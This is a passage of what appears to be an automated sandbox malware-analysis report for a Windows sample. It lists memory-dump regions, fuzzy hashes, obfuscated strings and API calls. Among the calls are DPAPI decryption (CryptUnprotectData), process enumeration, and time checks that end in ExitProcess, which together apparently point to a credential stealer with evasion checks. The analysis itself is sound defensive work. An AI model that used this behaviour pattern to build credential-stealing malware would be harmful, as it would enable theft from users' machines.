                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: EZgG$Kw:W$T5$Vf{$W{y
                                        • API String ID: 0-3200713465
                                        • Opcode ID: 0c11e4ac17bedf741a1202863e813483fc19936719768f9c955134cd01553c31
                                        • Instruction ID: d4b0ad528ca46801fb4581e60ecb19a6644d559e3e78bb7464f4dd0d690b6f07
                                        • Opcode Fuzzy Hash: 0c11e4ac17bedf741a1202863e813483fc19936719768f9c955134cd01553c31
                                        • Instruction Fuzzy Hash: 9BB227F3A08210AFE704AE2DEC8567ABBE9EFD4720F1A453DE6C4C7744E63158458693
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: \u$\u${${$}$}
                                        • API String ID: 0-582841131
                                        • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction ID: 528c8c927a71e2d0a0fa49f87b71ca9e423c297378a9f504e57d622b3ebd2f91
                                        • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction Fuzzy Hash: 73418212D19BD5C5CB058B7444A02EEBFB22FD6210F6D82DAC4DD1F782C774414AD3A5
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E1C971
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E1C97C
                                        • lstrcat.KERNEL32(?,00E30B47), ref: 00E1CA43
                                        • lstrcat.KERNEL32(?,00E30B4B), ref: 00E1CA57
                                        • lstrcat.KERNEL32(?,00E30B4E), ref: 00E1CA78
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        • API String ID: 189259977-0
                                        • Opcode ID: 7df0462fb698acd4ea8cdb5f113400332fb043b466cb44ef519cfb2af1dc6357
                                        • Instruction ID: eeb384dfb0972eb7ec232823413912ba112a1ef178d06322b87df6d9ed7aecd0
                                        • Opcode Fuzzy Hash: 7df0462fb698acd4ea8cdb5f113400332fb043b466cb44ef519cfb2af1dc6357
                                        • Instruction Fuzzy Hash: 90415E7490421EDBDB20CFA4DD99BEEBBB8AF48704F1051A8F609A7280D7755A84CF91
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 00E26C0C
                                        • sscanf.NTDLL ref: 00E26C39
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E26C52
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E26C60
                                        • ExitProcess.KERNEL32 ref: 00E26C7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: 08432a3af47bcb0d8b836a5428c458421e21261af55b0a65a92fdd1b8066814e
                                        • Instruction ID: db15de6f2de7e82660c1aa192e6ef30aa4bdb5e6cacb506bf4eaaa3e7014959d
                                        • Opcode Fuzzy Hash: 08432a3af47bcb0d8b836a5428c458421e21261af55b0a65a92fdd1b8066814e
                                        • Instruction Fuzzy Hash: ED21EBB5D04218ABCF14EFE4E8459EEB7B9FF48300F04852EE406B7254EB359608CB64
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E172AD
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E172B4
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E172E1
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00E17304
                                        • LocalFree.KERNEL32(?), ref: 00E1730E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        • Opcode ID: 56195aecd9385a9ef4894015d328b4aa0f1d909ac80ffd507759868965ede2f4
                                        • Instruction ID: 29b58956db3be49506553f61c43a12752ea4fd0bfdfe689ec924fd3557915576
                                        • Opcode Fuzzy Hash: 56195aecd9385a9ef4894015d328b4aa0f1d909ac80ffd507759868965ede2f4
                                        • Instruction Fuzzy Hash: 67015275A40308BBDB10DFE4CC46F9D77B8AB44B00F104048FB45BF2C4C6B1AA408B94
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E297AE
                                        • Process32First.KERNEL32(00E30ACE,00000128), ref: 00E297C2
                                        • Process32Next.KERNEL32(00E30ACE,00000128), ref: 00E297D7
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00E297EC
                                        • CloseHandle.KERNEL32(00E30ACE), ref: 00E2980A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 3f60bbb9820c744efbb9f5cfbdbfce4a0dd174ec5c1e1ec93dedab525843d95a
                                        • Instruction ID: deef5040bf569b3fceb1b5e7fe8709773a6e48e1026d531a8016af7efcb1926c
                                        • Opcode Fuzzy Hash: 3f60bbb9820c744efbb9f5cfbdbfce4a0dd174ec5c1e1ec93dedab525843d95a
                                        • Instruction Fuzzy Hash: A6015E75A00218EBDB24DFA5D944BDDB7F8BB08700F0451C8E509AB240E7759B40CF90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: <7\h$huzx
                                        • API String ID: 0-2989614873
                                        • Opcode ID: a3e07ba5621b467d194c6acc7a86064096a6621c5af7837559904d45af8accb3
                                        • Instruction ID: 2fdf21829ee492641c6a8be2a7a4594c7040247708155053d73d16dd2ac5bce3
                                        • Opcode Fuzzy Hash: a3e07ba5621b467d194c6acc7a86064096a6621c5af7837559904d45af8accb3
                                        • Instruction Fuzzy Hash: 9B63427341EBD41EC727CB3047BA1517F66FA13310B1969CEC8C1AB6B3C690AA16E356
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,00E151D4,40000001,00000000,00000000,?,00E151D4), ref: 00E29050
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: 12d417d9d380e42ec7eb29f19870a55ec69dabd26837430756c95f39ddbf4342
                                        • Instruction ID: 4e12da06ed6f6ae00da0737d9f323ac4971e7ded31a79a8eb4eb85d9172e794c
                                        • Opcode Fuzzy Hash: 12d417d9d380e42ec7eb29f19870a55ec69dabd26837430756c95f39ddbf4342
                                        • Instruction Fuzzy Hash: 75110674200218FFDF04CF55E894FAA37A9AF89714F10A448FA1A9B245D776E9418BA0
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01A8EC80,00000000,?,00E30DF8,00000000,?,00000000,00000000), ref: 00E27BF3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E27BFA
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01A8EC80,00000000,?,00E30DF8,00000000,?,00000000,00000000,?), ref: 00E27C0D
                                        • wsprintfA.USER32 ref: 00E27C47
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 3317088062-0
                                        • Opcode ID: fd9f0dcfcfc3b1bbe0e9119fbaa4b2e5cc8ba12fc16df7372f5a5fa3f6ad4c66
                                        • Instruction ID: ff5f920f7722236b224e8fe9c8e1f2d8d63be4ef918269f0035abae958d89148
                                        • Opcode Fuzzy Hash: fd9f0dcfcfc3b1bbe0e9119fbaa4b2e5cc8ba12fc16df7372f5a5fa3f6ad4c66
                                        • Instruction Fuzzy Hash: 6511A571E05228DBE720CB55DC45FA9BBB8F744711F1003D9F619A72C0D77419408B90
                                        APIs
                                        • CoCreateInstance.COMBASE(00E2E120,00000000,00000001,00E2E110,00000000), ref: 00E239A8
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00E23A00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        • Opcode ID: 9177645593a83dcd28f346e237a34f01b87c7553429798da466614dd951fe514
                                        • Instruction ID: 70b5675e87466c7b401c8ce80693e3b6bb010f48e62ca4b03fa24c626768c587
                                        • Opcode Fuzzy Hash: 9177645593a83dcd28f346e237a34f01b87c7553429798da466614dd951fe514
                                        • Instruction Fuzzy Hash: 5641F870A00A289FDB24DB58DC95F9BB7B5BB48702F4051D8E608EB2D0D7B1AE85CF50
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E1A2D4
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E1A2F3
                                        • LocalFree.KERNEL32(?), ref: 00E1A323
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                        • String ID:
                                        • API String ID: 2068576380-0
                                        • Opcode ID: ed866d46a58c32a593db6396566c28ab6eb6ab74ddce51d0024da51f3833f5b2
                                        • Instruction ID: 9897a69a8a8f5dd3b59fe3506ed82dd68383fcf7cde849f85ce5e3590f0fa275
                                        • Opcode Fuzzy Hash: ed866d46a58c32a593db6396566c28ab6eb6ab74ddce51d0024da51f3833f5b2
                                        • Instruction Fuzzy Hash: 2B11E8B4A00209DFCB04DFA8D985AAEB7B5FB88700F108569ED15AB354D774AE50CBA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
